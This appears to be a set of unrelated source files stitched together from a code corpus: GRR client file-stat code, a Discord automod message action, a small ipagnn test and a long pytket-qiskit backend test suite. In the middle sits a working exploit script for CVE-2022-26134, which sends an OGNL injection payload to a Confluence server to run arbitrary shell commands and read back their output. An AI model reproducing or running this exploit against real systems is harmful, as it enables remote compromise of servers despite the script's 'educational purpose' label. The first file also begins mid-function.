local_path = client_utils.CanonicalPathToLocalPath(path or self.path)
result = client_utils.StatEntryFromPath(
local_path, self.pathspec, ext_attrs=ext_attrs)
# Is this a symlink? If so we need to note the real location of the file.
try:
result.symlink = utils.SmartUnicode(os.readlink(local_path))
except (OSError, AttributeError):
pass
return result
def ListFiles(self, ext_attrs=False):
"""List all files in the dir."""
if not self.IsDirectory():
raise IOError("%s is not a directory." % self.path)
for path in self.files:
try:
response = self.Stat(
path=utils.JoinPath(self.path, path), ext_attrs=ext_attrs)
pathspec = self.pathspec.Copy()
pathspec.last.path = utils.JoinPath(pathspec.last.path, path)
response.pathspec = pathspec
yield response
except OSError:
pass
def IsDirectory(self):
return self.size is None
def StatFS(self, path=None):
"""Call os.statvfs for a given list of rdf_paths. OS X and Linux only.
Note that a statvfs call for a network filesystem (e.g. NFS) that is
unavailable, e.g. due to no network, will result in the call blocking.
Args:
path: a Unicode string containing the path or None.
If path is None the value in self.path is used.
Returns:
posix.statvfs_result object
Raises:
RuntimeError: if called on windows
"""
if platform.system() == "Windows":
raise RuntimeError("os.statvfs not available on Windows")
local_path = client_utils.CanonicalPathToLocalPath(path or self.path)
return os.statvfs(local_path)
def GetMountPoint(self, path=None):
"""Walk back from the path to find the mount point.
Args:
path: a Unicode string containing the path or None.
If path is None the value in self.path is used.
Returns:
path string of the mount point
"""
path = os.path.abspath(
client_utils.CanonicalPathToLocalPath(path or self.path))
while not os.path.ismount(path):
path = os.path.dirname(path)
return path
class TempFile(File):
"""GRR temporary files on the client."""
supported_pathtype = rdf_paths.PathSpec.PathType.TMPFILE
|
the-stack_0_6508 | from dataclasses import dataclass
from datetime import timedelta
from typing import Optional, Type, TypeVar
from discord.abc import Messageable
from commanderbot.ext.automod.automod_action import AutomodAction, AutomodActionBase
from commanderbot.ext.automod.automod_event import AutomodEvent
from commanderbot.lib import AllowedMentions, ChannelID, JsonObject
from commanderbot.lib.utils import timedelta_from_field_optional
ST = TypeVar("ST")
@dataclass
class SendMessage(AutomodActionBase):
"""
Send a message.
Attributes
----------
content
The content of the message to send.
channel
The channel to send the message in. Defaults to the channel in context.
allowed_mentions
The types of mentions allowed in the message. Unless otherwise specified, only
"everyone" mentions will be suppressed.
delete_after
The amount of time to delete the message after, if at all.
"""
content: str
channel: Optional[ChannelID] = None
allowed_mentions: Optional[AllowedMentions] = None
delete_after: Optional[timedelta] = None
@classmethod
def from_data(cls: Type[ST], data: JsonObject) -> ST:
allowed_mentions = AllowedMentions.from_field_optional(data, "allowed_mentions")
delete_after = timedelta_from_field_optional(data, "delete_after")
return cls(
description=data.get("description"),
content=data.get("content"),
channel=data.get("channel"),
allowed_mentions=allowed_mentions,
delete_after=delete_after,
)
async def resolve_channel(self, event: AutomodEvent) -> Optional[Messageable]:
if self.channel is not None:
return event.bot.get_channel(self.channel)
return event.channel
async def apply(self, event: AutomodEvent):
if channel := await self.resolve_channel(event):
content = event.format_content(self.content)
allowed_mentions = self.allowed_mentions or AllowedMentions.not_everyone()
params = dict(
allowed_mentions=allowed_mentions,
)
if self.delete_after is not None:
params.update(delete_after=self.delete_after.total_seconds())
await channel.send(content, **params)
def create_action(data: JsonObject) -> AutomodAction:
return SendMessage.from_data(data)
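# Minimal construction sketch (hedged: the action is normally built by the automod
# config loader via create_action(); only "content" is required by from_data(), and
# the channel ID below is a placeholder):
#
#   action = SendMessage.from_data({
#       "content": "Welcome!",
#       "channel": 123456789012345678,
#   })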
|
the-stack_0_6510 | # -*- coding: utf-8 -*-
# Author: Naqwada (RuptureFarm 1029) <[email protected]>
# License: MIT License (http://www.opensource.org/licenses/mit-license.php)
# Docs: https://github.com/Naqwa/CVE-2022-26134
# Website: http://samy.link/
# Linkedin: https://www.linkedin.com/in/samy-younsi/
# Note: FOR EDUCATIONAL PURPOSE ONLY.
from bs4 import BeautifulSoup
import requests
import urllib3
import re
import sys
urllib3.disable_warnings()
def banner():
CVE_2022_26134Logo = """
_______ ________
/ ____/ | / / ____/
/ / | | / / __/
/ /___ | |/ / /___
\____/ |___/_____/___ ___ _____________ __ __
|__ \ / __ \__ \|__ \ |__ \ / ___< /__ // // /
__/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_
/ __// /_/ / __// __/_____/ __// /_/ / /___/ /__ __/
/____/\____/____/____/ /____/\____/_//____/ /_/
\033[1;91mCVE-2022-26134 - OGNL injection vulnerability\033[1;m
Author: \033[1;92mNaqwada\033[1;m
RuptureFarm 1029
FOR EDUCATIONAL PURPOSE ONLY.
"""
return print('\033[1;94m{}\033[1;m'.format(CVE_2022_26134Logo))
def check_target_version(host):
try:
response = requests.get("{}/login.action".format(host), verify=False, timeout=8)
if response.status_code == 200:
filter_version = re.findall("<span id='footer-build-information'>.*</span>", response.text)
if len(filter_version) >= 1:
version = filter_version[0].split("'>")[1].split('</')[0]
return version
else:
return 0
else:
return host
except:
return False
def send_payload(host, command):
payload = "%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D".format(command)
response = requests.get("{}/{}/".format(host, payload), verify=False, allow_redirects=False)
try:
if response.status_code == 302:
return response.headers["X-Cmd-Response"]
else:
return "This target does not seem to be vulnerable."
except:
return "This target does not seem to be vulnerable."
def main():
banner()
if len(sys.argv) < 3:
print("\033[1;94mHow to use:\033[1;m")
print("python3 {} https://target.com cmd".format(sys.argv[0]))
print("ex: python3 {} https://target.com id".format(sys.argv[0]))
print("ex: python3 {} https://target.com 'ps aux'".format(sys.argv[0]))
return
target = sys.argv[1]
cmd = sys.argv[2]
version = check_target_version(target)
if version:
print("Confluence target version: \033[1;94m{}\033[1;m".format(version))
elif version is False:
print("The target seems offline.")
return
else:
print("Can't find the used version for this target.")
exec_payload = send_payload(target, cmd)
print(exec_payload)
if __name__ == "__main__":
main() |
the-stack_0_6512 | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Learned Interpreters workflows."""
from absl.testing import absltest
import jax.numpy as jnp
from ipagnn.adapters import common_adapters
class CommonAdaptersTest(absltest.TestCase):
def test_compute_weighted_cross_entropy(self):
logits = jnp.array([
[[.8, .2, -.5],
[.2, .5, -.1]],
[[.1, -.2, .2],
[.4, -.5, .1]],
])
labels = jnp.array([
[0, 1],
[2, 2],
])
common_adapters.compute_weighted_cross_entropy(logits, labels)
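# Shape note: `logits` is [batch=2, timesteps=2, vocab=3] and `labels` is [2, 2]; the
# call is a smoke test that the weighted cross-entropy helper accepts these shapes.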
if __name__ == '__main__':
absltest.main()
|
the-stack_0_6513 | # Copyright 2019-2022 Cambridge Quantum Computing
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import sys
from collections import Counter
from typing import Dict, cast
import math
import cmath
import pickle
from hypothesis import given, strategies
import numpy as np
from pytket.circuit import Circuit, OpType, BasisOrder, Qubit, reg_eq # type: ignore
from pytket.passes import CliffordSimp # type: ignore
from pytket.pauli import Pauli, QubitPauliString # type: ignore
from pytket.predicates import CompilationUnit, NoMidMeasurePredicate # type: ignore
from pytket.architecture import Architecture # type: ignore
from pytket.mapping import MappingManager, LexiLabellingMethod, LexiRouteRoutingMethod # type: ignore
from pytket.transform import Transform # type: ignore
from pytket.backends import (
ResultHandle,
CircuitNotRunError,
CircuitNotValidError,
CircuitStatus,
StatusEnum,
)
from pytket.extensions.qiskit import (
IBMQBackend,
AerBackend,
AerStateBackend,
AerUnitaryBackend,
IBMQEmulatorBackend,
)
from pytket.extensions.qiskit import qiskit_to_tk, process_characterisation
from pytket.utils.expectations import (
get_pauli_expectation_value,
get_operator_expectation_value,
)
from pytket.utils.operators import QubitPauliOperator
from pytket.utils.results import compare_unitaries
from qiskit import IBMQ # type: ignore
from qiskit import ClassicalRegister, QuantumCircuit, QuantumRegister
from qiskit.circuit import Parameter # type: ignore
from qiskit.providers.aer.noise.noise_model import NoiseModel # type: ignore
from qiskit.providers.aer.noise import ReadoutError # type: ignore
from qiskit.providers.aer.noise.errors import depolarizing_error, pauli_error # type: ignore
import pytest
# TODO add tests for `get_operator_expectation_value`
skip_remote_tests: bool = (
not IBMQ.stored_account() or os.getenv("PYTKET_RUN_REMOTE_TESTS") is None
)
REASON = "PYTKET_RUN_REMOTE_TESTS not set (requires configuration of IBMQ account)"
@pytest.fixture(scope="module")
def santiago_backend() -> IBMQBackend:
return IBMQBackend("ibmq_santiago", hub="ibm-q", group="open", project="main")
@pytest.fixture(scope="module")
def lima_backend() -> IBMQBackend:
return IBMQBackend("ibmq_lima", hub="ibm-q", group="open", project="main")
def circuit_gen(measure: bool = False) -> Circuit:
c = Circuit(2, 2)
c.H(0)
c.CX(0, 1)
if measure:
c.measure_all()
return c
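# circuit_gen() prepares the Bell state (|00> + |11>)/sqrt(2), which is why
# test_statevector below expects the amplitudes [1/sqrt(2), 0, 0, 1/sqrt(2)] and the
# sampled shots on a noiseless backend are always perfectly correlated.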
def get_test_circuit(measure: bool) -> QuantumCircuit:
qr = QuantumRegister(5)
cr = ClassicalRegister(5)
qc = QuantumCircuit(qr, cr)
# qc.h(qr[0])
qc.x(qr[0])
qc.x(qr[2])
qc.cx(qr[1], qr[0])
# qc.h(qr[1])
qc.cx(qr[0], qr[3])
qc.cz(qr[2], qr[0])
qc.cx(qr[1], qr[3])
# qc.rx(PI/2,qr[3])
qc.z(qr[2])
if measure:
qc.measure(qr[0], cr[0])
qc.measure(qr[1], cr[1])
qc.measure(qr[2], cr[2])
qc.measure(qr[3], cr[3])
return qc
def test_statevector() -> None:
c = circuit_gen()
b = AerStateBackend()
state = b.run_circuit(c).get_state()
assert np.allclose(state, [math.sqrt(0.5), 0, 0, math.sqrt(0.5)], atol=1e-10)
c.add_phase(0.5)
state1 = b.run_circuit(c).get_state()
assert np.allclose(state1, state * 1j, atol=1e-10)
def test_sim() -> None:
c = circuit_gen(True)
b = AerBackend()
shots = b.run_circuit(c, n_shots=1024).get_shots()
print(shots)
def test_measures() -> None:
n_qbs = 12
c = Circuit(n_qbs, n_qbs)
x_qbs = [2, 5, 7, 11]
for i in x_qbs:
c.X(i)
c.measure_all()
b = AerBackend()
shots = b.run_circuit(c, n_shots=10).get_shots()
all_ones = True
all_zeros = True
for i in x_qbs:
all_ones = all_ones and bool(np.all(shots[:, i]))
for i in range(n_qbs):
if i not in x_qbs:
all_zeros = all_zeros and (not np.any(shots[:, i]))
assert all_ones
assert all_zeros
def test_noise() -> None:
with open(os.path.join(sys.path[0], "ibmqx2_properties.pickle"), "rb") as f:
properties = pickle.load(f)
noise_model = NoiseModel.from_backend(properties)
n_qbs = 5
c = Circuit(n_qbs, n_qbs)
x_qbs = [2, 0, 4]
for i in x_qbs:
c.X(i)
c.measure_all()
b = AerBackend(noise_model)
n_shots = 50
c = b.get_compiled_circuit(c)
shots = b.run_circuit(c, n_shots=n_shots, seed=4).get_shots()
zer_exp = []
one_exp = []
for i in range(n_qbs):
expectation = np.sum(shots[:, i]) / n_shots
if i in x_qbs:
one_exp.append(expectation)
else:
zer_exp.append(expectation)
assert min(one_exp) > max(zer_exp)
c2 = (
Circuit(4, 4)
.H(0)
.CX(0, 2)
.CX(3, 1)
.T(2)
.CX(0, 1)
.CX(0, 3)
.CX(2, 1)
.measure_all()
)
c2 = b.get_compiled_circuit(c2)
shots = b.run_circuit(c2, n_shots=10, seed=5).get_shots()
assert shots.shape == (10, 4)
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_process_characterisation() -> None:
if not IBMQ.active_account():
IBMQ.load_account()
provider = IBMQ.providers(hub="ibm-q", group="open")[0]
back = provider.get_backend("ibmq_santiago")
char = process_characterisation(back)
arch: Architecture = char.get("Architecture", Architecture([]))
node_errors: dict = char.get("NodeErrors", {})
link_errors: dict = char.get("EdgeErrors", {})
assert len(arch.nodes) == 5
assert len(arch.coupling) == 8
assert len(node_errors) == 5
assert len(link_errors) == 8
def test_process_characterisation_no_noise_model() -> None:
my_noise_model = NoiseModel()
back = AerBackend(my_noise_model)
assert back.backend_info.get_misc("characterisation") is None
c = Circuit(4).CX(0, 1).H(2).CX(2, 1).H(3).CX(0, 3).H(1).X(0)
c = back.get_compiled_circuit(c)
assert back.valid_circuit(c)
def test_process_characterisation_incomplete_noise_model() -> None:
my_noise_model = NoiseModel()
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [0, 1])
my_noise_model.add_quantum_error(depolarizing_error(0.5, 1), ["u3"], [1])
my_noise_model.add_quantum_error(depolarizing_error(0.1, 1), ["u3"], [3])
my_noise_model.add_quantum_error(
pauli_error([("X", 0.35), ("Z", 0.65)]), ["u2"], [0]
)
my_noise_model.add_quantum_error(
pauli_error([("X", 0.35), ("Y", 0.65)]), ["u1"], [2]
)
back = AerBackend(my_noise_model)
c = Circuit(4).CX(0, 1).H(2).CX(2, 1).H(3).CX(0, 3).H(1).X(0).measure_all()
c = back.get_compiled_circuit(c)
assert back.valid_circuit(c)
arch = back.backend_info.architecture
nodes = arch.nodes
assert set(arch.coupling) == set(
[
(nodes[0], nodes[1]),
(nodes[0], nodes[2]),
(nodes[0], nodes[3]),
(nodes[1], nodes[2]),
(nodes[1], nodes[3]),
(nodes[2], nodes[0]),
(nodes[2], nodes[1]),
(nodes[2], nodes[3]),
(nodes[3], nodes[0]),
(nodes[3], nodes[1]),
(nodes[3], nodes[2]),
]
)
def test_circuit_compilation_complete_noise_model() -> None:
my_noise_model = NoiseModel()
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [0, 1])
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [0, 2])
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [0, 3])
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [1, 2])
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [1, 3])
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [2, 3])
my_noise_model.add_quantum_error(depolarizing_error(0.5, 1), ["u3"], [0])
my_noise_model.add_quantum_error(depolarizing_error(0.5, 1), ["u3"], [1])
my_noise_model.add_quantum_error(depolarizing_error(0.5, 1), ["u3"], [2])
my_noise_model.add_quantum_error(depolarizing_error(0.5, 1), ["u3"], [3])
back = AerBackend(my_noise_model)
c = Circuit(4).CX(0, 1).H(2).CX(2, 1).H(3).CX(0, 3).H(1).X(0).measure_all()
c = back.get_compiled_circuit(c)
assert back.valid_circuit(c)
def test_process_characterisation_complete_noise_model() -> None:
my_noise_model = NoiseModel()
readout_error_0 = 0.2
readout_error_1 = 0.3
my_noise_model.add_readout_error(
[
[1 - readout_error_0, readout_error_0],
[readout_error_0, 1 - readout_error_0],
],
[0],
)
my_noise_model.add_readout_error(
[
[1 - readout_error_1, readout_error_1],
[readout_error_1, 1 - readout_error_1],
],
[1],
)
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [0, 1])
my_noise_model.add_quantum_error(depolarizing_error(0.5, 1), ["u3"], [0])
my_noise_model.add_quantum_error(
pauli_error([("X", 0.35), ("Z", 0.65)]), ["u2"], [0]
)
my_noise_model.add_quantum_error(
pauli_error([("X", 0.35), ("Y", 0.65)]), ["u1"], [0]
)
back = AerBackend(my_noise_model)
char = back.backend_info.get_misc("characterisation")
node_errors = cast(Dict, back.backend_info.all_node_gate_errors)
link_errors = cast(Dict, back.backend_info.all_edge_gate_errors)
arch = back.backend_info.architecture
gqe2 = {tuple(qs): errs for qs, errs in char["GenericTwoQubitQErrors"]}
gqe1 = {q: errs for q, errs in char["GenericOneQubitQErrors"]}
assert round(gqe2[(0, 1)][0][1][15], 5) == 0.0375
assert round(gqe2[(0, 1)][0][1][0], 5) == 0.4375
assert gqe1[0][0][1][3] == 0.125
assert gqe1[0][0][1][0] == 0.625
assert gqe1[0][1][1][0] == 0.35
assert gqe1[0][1][1][1] == 0.65
assert gqe1[0][2][1][0] == 0.35
assert gqe1[0][2][1][1] == 0.65
assert node_errors[arch.nodes[0]][OpType.U3] == 0.375
assert round(link_errors[(arch.nodes[0], arch.nodes[1])][OpType.CX], 4) == 0.5625
assert (
round(link_errors[(arch.nodes[1], arch.nodes[0])][OpType.CX], 8) == 0.80859375
)
readout_errors = cast(Dict, back.backend_info.all_readout_errors)
assert readout_errors[arch.nodes[0]] == [
[0.8, 0.2],
[0.2, 0.8],
]
assert readout_errors[arch.nodes[1]] == [
[0.7, 0.3],
[0.3, 0.7],
]
def test_process_model() -> None:
noise_model = NoiseModel()
# add readout error to qubits 0, 1, 2
error_ro = ReadoutError([[0.8, 0.2], [0.2, 0.8]])
for i in range(3):
noise_model.add_readout_error(error_ro, [i])
# add depolarizing error to qubits 3, 4, 5
error_dp_sq = depolarizing_error(0.5, 1)
for i in range(3, 6):
noise_model.add_quantum_error(error_dp_sq, ["u3"], [i])
error_dp_mq = depolarizing_error(0.6, 2)
# add coupling errors
noise_model.add_quantum_error(error_dp_mq, ["cx"], [0, 7])
noise_model.add_quantum_error(error_dp_mq, ["cx"], [1, 2])
noise_model.add_quantum_error(error_dp_mq, ["cx"], [8, 9])
# check basic information has been captured
b = AerBackend(noise_model)
nodes = b.backend_info.architecture.nodes
assert len(nodes) == 9
assert "characterisation" in b.backend_info.misc
assert "GenericOneQubitQErrors" in b.backend_info.misc["characterisation"]
assert "GenericTwoQubitQErrors" in b.backend_info.misc["characterisation"]
node_gate_errors = cast(Dict, b.backend_info.all_node_gate_errors)
assert nodes[3] in node_gate_errors
edge_gate_errors = cast(Dict, b.backend_info.all_edge_gate_errors)
assert (nodes[7], nodes[8]) in edge_gate_errors
def test_cancellation_aer() -> None:
b = AerBackend()
c = circuit_gen(True)
c = b.get_compiled_circuit(c)
h = b.process_circuit(c, 10)
b.cancel(h)
print(b.circuit_status(h))
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_cancellation_ibmq(lima_backend: IBMQBackend) -> None:
b = lima_backend
c = circuit_gen(True)
c = b.get_compiled_circuit(c)
h = b.process_circuit(c, 10)
b.cancel(h)
print(b.circuit_status(h))
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_machine_debug(santiago_backend: IBMQBackend) -> None:
backend = santiago_backend
backend._MACHINE_DEBUG = True
try:
c = Circuit(2, 2).H(0).CX(0, 1).measure_all()
with pytest.raises(CircuitNotValidError) as errorinfo:
handles = backend.process_circuits([c, c.copy()], n_shots=2)
assert "in submitted does not satisfy GateSetPredicate" in str(errorinfo.value)
c = backend.get_compiled_circuit(c)
handles = backend.process_circuits([c, c.copy()], n_shots=4)
from pytket.extensions.qiskit.backends.ibm import _DEBUG_HANDLE_PREFIX
assert all(
cast(str, hand[0]).startswith(_DEBUG_HANDLE_PREFIX) for hand in handles
)
correct_shots = np.zeros((4, 2))
correct_counts = {(0, 0): 4}
res = backend.run_circuit(c, n_shots=4)
assert np.all(res.get_shots() == correct_shots)
assert res.get_counts() == correct_counts
# check that generating new shots still works
res = backend.run_circuit(c, n_shots=4)
assert np.all(res.get_shots() == correct_shots)
assert res.get_counts() == correct_counts
finally:
# ensure shared backend is reset for other tests
backend._MACHINE_DEBUG = False
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_nshots_batching(santiago_backend: IBMQBackend) -> None:
backend = santiago_backend
backend._MACHINE_DEBUG = True
try:
c1 = Circuit(2, 2).H(0).CX(0, 1).measure_all()
c2 = Circuit(2, 2).Rx(0.5, 0).CX(0, 1).measure_all()
c3 = Circuit(2, 2).H(1).CX(0, 1).measure_all()
c4 = Circuit(2, 2).Rx(0.5, 0).CX(0, 1).CX(1, 0).measure_all()
cs = [c1, c2, c3, c4]
n_shots = [10, 12, 10, 13]
cs = backend.get_compiled_circuits(cs)
handles = backend.process_circuits(cs, n_shots=n_shots)
from pytket.extensions.qiskit.backends.ibm import _DEBUG_HANDLE_PREFIX
assert all(
cast(str, hand[0]) == _DEBUG_HANDLE_PREFIX + suffix
for hand, suffix in zip(
handles,
[f"{(2, 10, 0)}", f"{(2, 12, 1)}", f"{(2, 10, 0)}", f"{(2, 13, 2)}"],
)
)
finally:
# ensure shared backend is reset for other tests
backend._MACHINE_DEBUG = False
def test_nshots() -> None:
backends = [AerBackend()]
if not skip_remote_tests:
backends.append(
IBMQEmulatorBackend(
"ibmq_santiago", hub="ibm-q", group="open", project="main"
)
)
for b in backends:
circuit = Circuit(1).X(0)
n_shots = [1, 2, 3]
results = b.get_results(b.process_circuits([circuit] * 3, n_shots=n_shots))
assert [len(r.get_shots()) for r in results] == n_shots
def test_pauli_statevector() -> None:
c = Circuit(2)
c.Rz(0.5, 0)
Transform.OptimisePostRouting().apply(c)
b = AerStateBackend()
zi = QubitPauliString(Qubit(0), Pauli.Z)
assert get_pauli_expectation_value(c, zi, b) == 1
c.X(0)
assert get_pauli_expectation_value(c, zi, b) == -1
def test_pauli_sim() -> None:
c = Circuit(2, 2)
c.Rz(0.5, 0)
Transform.OptimisePostRouting().apply(c)
b = AerBackend()
zi = QubitPauliString(Qubit(0), Pauli.Z)
energy = get_pauli_expectation_value(c, zi, b, 8000)
assert abs(energy - 1) < 0.001
c.X(0)
energy = get_pauli_expectation_value(c, zi, b, 8000)
assert abs(energy + 1) < 0.001
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_default_pass(santiago_backend: IBMQBackend) -> None:
b = santiago_backend
for ol in range(3):
comp_pass = b.default_compilation_pass(ol)
c = Circuit(3, 3)
c.H(0)
c.CX(0, 1)
c.CSWAP(1, 0, 2)
c.ZZPhase(0.84, 2, 0)
c.measure_all()
comp_pass.apply(c)
for pred in b.required_predicates:
assert pred.verify(c)
def test_aer_default_pass() -> None:
with open(os.path.join(sys.path[0], "ibmqx2_properties.pickle"), "rb") as f:
properties = pickle.load(f)
noise_model = NoiseModel.from_backend(properties)
for nm in [None, noise_model]:
b = AerBackend(nm)
for ol in range(3):
comp_pass = b.default_compilation_pass(ol)
c = Circuit(3, 3)
c.H(0)
c.CX(0, 1)
c.CSWAP(1, 0, 2)
c.ZZPhase(0.84, 2, 0)
c.add_gate(OpType.TK1, [0.2, 0.3, 0.4], [0])
comp_pass.apply(c)
c.measure_all()
for pred in b.required_predicates:
assert pred.verify(c)
def test_routing_measurements() -> None:
qc = get_test_circuit(True)
physical_c = qiskit_to_tk(qc)
sim = AerBackend()
original_results = sim.run_circuit(physical_c, n_shots=10, seed=4).get_shots()
coupling = [[1, 0], [2, 0], [2, 1], [3, 2], [3, 4], [4, 2]]
arc = Architecture(coupling)
mm = MappingManager(arc)
mm.route_circuit(physical_c, [LexiLabellingMethod(), LexiRouteRoutingMethod()])
Transform.DecomposeSWAPtoCX().apply(physical_c)
Transform.DecomposeCXDirected(arc).apply(physical_c)
Transform.OptimisePostRouting().apply(physical_c)
assert (
sim.run_circuit(physical_c, n_shots=10).get_shots() == original_results
).all()
def test_routing_no_cx() -> None:
circ = Circuit(2, 2)
circ.H(1)
circ.Rx(0.2, 0)
circ.measure_all()
coupling = [[1, 0], [2, 0], [2, 1], [3, 2], [3, 4], [4, 2]]
arc = Architecture(coupling)
mm = MappingManager(arc)
mm.route_circuit(circ, [LexiRouteRoutingMethod()])
assert len(circ.get_commands()) == 4
def test_counts() -> None:
qc = get_test_circuit(True)
circ = qiskit_to_tk(qc)
sim = AerBackend()
counts = sim.run_circuit(circ, n_shots=10, seed=4).get_counts()
assert counts == {(1, 0, 1, 1, 0): 10}
def test_ilo() -> None:
b = AerBackend()
bs = AerStateBackend()
bu = AerUnitaryBackend()
c = Circuit(2)
c.X(1)
res_s = bs.run_circuit(c)
res_u = bu.run_circuit(c)
assert (res_s.get_state() == np.asarray([0, 1, 0, 0])).all()
assert (res_s.get_state(basis=BasisOrder.dlo) == np.asarray([0, 0, 1, 0])).all()
assert (
res_u.get_unitary()
== np.asarray([[0, 1, 0, 0], [1, 0, 0, 0], [0, 0, 0, 1], [0, 0, 1, 0]])
).all()
assert (
res_u.get_unitary(basis=BasisOrder.dlo)
== np.asarray([[0, 0, 1, 0], [0, 0, 0, 1], [1, 0, 0, 0], [0, 1, 0, 0]])
).all()
c.measure_all()
res = b.run_circuit(c, n_shots=2)
assert (res.get_shots() == np.asarray([[0, 1], [0, 1]])).all()
assert (res.get_shots(basis=BasisOrder.dlo) == np.asarray([[1, 0], [1, 0]])).all()
assert res.get_counts() == {(0, 1): 2}
assert res.get_counts(basis=BasisOrder.dlo) == {(1, 0): 2}
def test_swaps_basisorder() -> None:
# Check that implicit swaps can be corrected irrespective of BasisOrder
b = AerStateBackend()
c = Circuit(4)
c.X(0)
c.CX(0, 1)
c.CX(1, 0)
c.CX(1, 3)
c.CX(3, 1)
c.X(2)
cu = CompilationUnit(c)
CliffordSimp(True).apply(cu)
c1 = cu.circuit
assert c1.n_gates_of_type(OpType.CX) == 2
c, c1 = b.get_compiled_circuits([c, c1])
handles = b.process_circuits([c, c1])
res_c = b.run_circuit(c)
res_c1 = b.run_circuit(c1)
s_ilo = res_c1.get_state(basis=BasisOrder.ilo)
correct_ilo = res_c.get_state(basis=BasisOrder.ilo)
assert np.allclose(s_ilo, correct_ilo)
s_dlo = res_c1.get_state(basis=BasisOrder.dlo)
correct_dlo = res_c.get_state(basis=BasisOrder.dlo)
assert np.allclose(s_dlo, correct_dlo)
qbs = c.qubits
for result in b.get_results(handles):
assert (
result.get_state([qbs[1], qbs[2], qbs[3], qbs[0]]).real.tolist().index(1.0)
== 6
)
assert (
result.get_state([qbs[2], qbs[1], qbs[0], qbs[3]]).real.tolist().index(1.0)
== 9
)
assert (
result.get_state([qbs[2], qbs[3], qbs[0], qbs[1]]).real.tolist().index(1.0)
== 12
)
bu = AerUnitaryBackend()
res_c = bu.run_circuit(c)
res_c1 = bu.run_circuit(c1)
u_ilo = res_c1.get_unitary(basis=BasisOrder.ilo)
correct_ilo = res_c.get_unitary(basis=BasisOrder.ilo)
assert np.allclose(u_ilo, correct_ilo)
u_dlo = res_c1.get_unitary(basis=BasisOrder.dlo)
correct_dlo = res_c.get_unitary(basis=BasisOrder.dlo)
assert np.allclose(u_dlo, correct_dlo)
def test_pauli() -> None:
for b in [AerBackend(), AerStateBackend()]:
c = Circuit(2)
c.Rz(0.5, 0)
c = b.get_compiled_circuit(c)
zi = QubitPauliString(Qubit(0), Pauli.Z)
assert cmath.isclose(get_pauli_expectation_value(c, zi, b), 1)
c.X(0)
assert cmath.isclose(get_pauli_expectation_value(c, zi, b), -1)
def test_operator() -> None:
for b in [AerBackend(), AerStateBackend()]:
c = circuit_gen()
zz = QubitPauliOperator(
{QubitPauliString([Qubit(0), Qubit(1)], [Pauli.Z, Pauli.Z]): 1.0}
)
assert cmath.isclose(get_operator_expectation_value(c, zz, b), 1.0)
c.X(0)
assert cmath.isclose(get_operator_expectation_value(c, zz, b), -1.0)
# TKET-1432 this was either too slow or consumed too much memory when bugged
@pytest.mark.timeout(10)
def test_expectation_bug() -> None:
backend = AerStateBackend()
# backend.compile_circuit(circuit)
circuit = Circuit(16)
with open("big_hamiltonian.json", "r") as f:
hamiltonian = QubitPauliOperator.from_list(json.load(f))
exp = backend.get_operator_expectation_value(circuit, hamiltonian)
assert np.isclose(exp, 1.4325392)
def test_aer_result_handle() -> None:
c = Circuit(2, 2).H(0).CX(0, 1).measure_all()
b = AerBackend()
handles = b.process_circuits([c, c.copy()], n_shots=2)
ids, indices = zip(*(han for han in handles))
assert all(isinstance(idval, str) for idval in ids)
assert indices == (0, 1)
assert len(b.get_result(handles[0]).get_shots()) == 2
with pytest.raises(TypeError) as errorinfo:
_ = b.get_result(ResultHandle("43"))
assert "ResultHandle('43',) does not match expected identifier types" in str(
errorinfo.value
)
wronghandle = ResultHandle("asdf", 3)
with pytest.raises(CircuitNotRunError) as errorinfoCirc:
_ = b.get_result(wronghandle)
assert "Circuit corresponding to {0!r} ".format(
wronghandle
) + "has not been run by this backend instance." in str(errorinfoCirc.value)
def test_aerstate_result_handle() -> None:
c = circuit_gen()
b1 = AerStateBackend()
h1 = b1.process_circuits([c])[0]
state = b1.get_result(h1).get_state()
status = b1.circuit_status(h1)
assert status == CircuitStatus(StatusEnum.COMPLETED, "job has successfully run")
assert np.allclose(state, [np.sqrt(0.5), 0, 0, math.sqrt(0.5)], atol=1e-10)
b2 = AerUnitaryBackend()
unitary = b2.run_circuit(c).get_unitary()
assert np.allclose(
unitary,
np.sqrt(0.5)
* np.array([[1, 0, 1, 0], [0, 1, 0, 1], [0, 1, 0, -1], [1, 0, -1, 0]]),
)
def test_cache() -> None:
b = AerBackend()
c = circuit_gen()
c = b.get_compiled_circuit(c)
h = b.process_circuits([c], 2)[0]
b.get_result(h).get_shots()
assert h in b._cache
b.pop_result(h)
assert h not in b._cache
assert not b._cache
b.run_circuit(c, n_shots=2).get_counts()
b.run_circuit(c.copy(), n_shots=2).get_counts()
b.empty_cache()
assert not b._cache
